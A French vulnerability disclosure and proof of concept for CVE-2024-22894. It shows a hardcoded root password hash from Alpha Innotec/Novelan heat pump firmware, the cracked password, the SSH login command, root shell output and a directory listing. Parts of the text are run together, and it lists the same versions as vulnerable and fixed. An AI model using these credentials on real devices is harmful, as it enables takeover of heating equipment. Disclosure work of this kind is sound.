
Preuve de concept pour CVE-2024-22894, démontrant l'extraction du mot de passe root chiffré en 3DES à partir du firmware de pompe à chaleur Alpha Innotec/Novelan, permettant un accès SSH aux appareils IoT vulnérables.
Téléchargé la dernière version du firmware de la pompe à chaleur wp2reg-V3.88.0-9015 depuis https://www.heatpump24.com/DownloadArea.php.
Dans ce firmware se trouve un fichier appelé : wp2reg-V3.88.0-9015\wp2reg-AlphaInnotech-prod\home.wp2reg-V3.88.0-9015_221213\share\shadow
Celui-ci contient un mot de passe crypté en 3DES root:MEfgX2vrPJzuE:0:0:99999:7::: de l'utilisateur root du système et, une fois décrypté/cassé (en moins de 5 secondes), affiche le mot de passe eschi.
Lorsque vous connectez la pompe à chaleur au réseau à l'aide d'un câble réseau, vous pouvez utiliser l'utilisateur 'root' et le mot de passe trouvé pour vous connecter au service SSH disponible.
> ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes256-cbc root@$IP
$IP's password: eschi
# id
uid=0(root) gid=0 groups=0
# uname -a
Linux [...] 2.6.33.20 #3 PREEMPT Wed Oct 24 14:25:34 CEST 2018 armv5tejl GNU/Linux
Cette vulnérabilité s'applique à toutes les pompes à chaleur Alpha Innotec et Novelan utilisant le contrôleur Luxtronic. Elle a été vérifiée et traitée par AIT Deutschland, l'OEM d'Alpha Innotec et de Novelan, et la vulnérabilité est présente dans les versions de firmware suivantes :
V2.88.3V3.89.0V4.81.3La pompe à chaleur doit être connectée au réseau via une connexion LAN (RJ-45) pour pouvoir en abuser. Selon Shodan, il y a encore 47 pompes à chaleur connectées à Internet utilisant la même version et la même empreinte SSH, qui pourraient être compromises en utilisant cet exploit.
Une fois exploitée, elle pourrait causer beaucoup de dégâts, en modifiant les paramètres ou en supprimant toute la configuration/logiciel, ce qui entraînerait un dysfonctionnement ou un crash de la pompe à chaleur. Par exemple, le répertoire home contient les fichiers suivants qui pourraient intéresser un attaquant :
# ls -alh /home
total 7448
drwxr-xr-x 5 root 0 4.8K Jan 12 08:59 .
drwxr-xr-x 14 root 0 992 Aug 1 2011 ..
drwxr-xr-x 3 root 0 224 Jan 1 1970 .update
-rw-rw-rw- 1 root 0 92.3K Jul 20 2022 10Min_1
-rw-rw-rw- 1 root 0 92.3K Sep 15 2022 10Min_2
-rwxrwxrwx 1 root 0 22.3K Jan 13 2021 ASB.bin
-rwxrwxrwx 1 root 0 23.3K Jul 15 2019 ASB_BL_Switch.bin
-rwxrwxrwx 1 root 0 22.1K Jul 15 2019 ASB_bootloader.bin
-rwxrwxrwx 1 root 0 1.2K Jun 16 2021 Defines.txt
-rwxrwxrwx 1 root 0 15.7K Jun 14 2021 HZIO.lin
-rw-rw-rw- 1 root 0 648 Jan 3 18:55 Info.dti
-rwxrwxrwx 1 root 0 15.3K Jul 24 2020 LD2AG.lin
-rwxrwxrwx 1 root 0 37.5K Jul 15 2019 LWD.lin
-rwxrwxrwx 1 root 0 26.8K Feb 8 2021 LWD45.lin
-rwxrwxrwx 1 root 0 38.8K Jul 15 2019 LWD90.lin
-rwxrwxrwx 1 root 0 37.9K Jul 15 2019 LWDRev.lin
-rwxrwxrwx 1 root 0 40.0K Jun 16 2021 LuxConst.sqlite
-rwxrwxrwx 1 root 0 26.9K Jul 24 2020 MSW_15.lin
-rwxrwxrwx 1 root 0 28.4K Jul 24 2020 MSW_Inverter.lin
-rw-rw-rw- 1 root 0 435.2K Jan 12 08:59 NewProc
-rw-rw-rw- 1 root 0 8.8K Jan 1 01:00 ParamArchive_1704067200
[...]
-rw-rw-rw- 1 root 0 8.8K Jan 12 01:00 ParamArchive_1705017600
-rwxrwxrwx 1 root 0 96.9K Jul 15 2019 SEC.bin
-rwxrwxrwx 1 root 0 31.6K Jul 15 2019 SWP.lin
-rwxrwxrwx 1 root 0 30.6K Jul 15 2019 SWPH.lin
-rwxrwxrwx 1 root 0 30.4K Jul 15 2019 SWPH291.lin
drwxrwxrwx 2 root 0 648 Apr 25 2023 Webserver
-rwxrwxrwx 1 root 0 5.0M Jun 16 2021 appl
-rwxrwxrwx 1 root 0 147 Jul 15 2019 appl.cfg
-rw-rw-rw- 1 root 0 8.8K Jan 12 08:59 appl_param1
-rw-rw-rw- 1 root 0 8.8K Jan 12 06:59 appl_param2
-rwxrwxrwx 1 root 0 9.4K Jul 15 2019 bootloader.lin
-rw-r--r-- 1 root 0 20.0K Jan 1 05:10 default.sqlite
-rw-r--r-- 1 root 0 0 Jan 1 1970 default.sqlite-wal
-rw-rw-r-- 1 root 0 56 Sep 15 2022 errlog
-rw-r--r-- 1 root 0 42.9K Apr 1 2011 firmware
-rwxrwxrwx 1 root 0 391 Jul 15 2019 index.html
-rwxrwxrwx 1 root 0 35.2K Jun 16 2021 lang_CR
[...
-rwxrwxrwx 1 root 0 37.8K Jun 16 2021 lang_tr
drwxr-xr-x 2 root 0 360 Jan 1 1970 share
-rwxrwxrwx 1 root 0 37 Jul 15 2019 timezone
-rwxrwxrwx 1 root 0 1.1K Jul 15 2019 udhcpc.script
V2.88.3 ou supérieureV3.89.0 ou supérieureV4.81.3 ou supérieureLes crédits vont à AIT-Deutschland pour avoir pris ce problème au sérieux et l'avoir corrigé en priorité.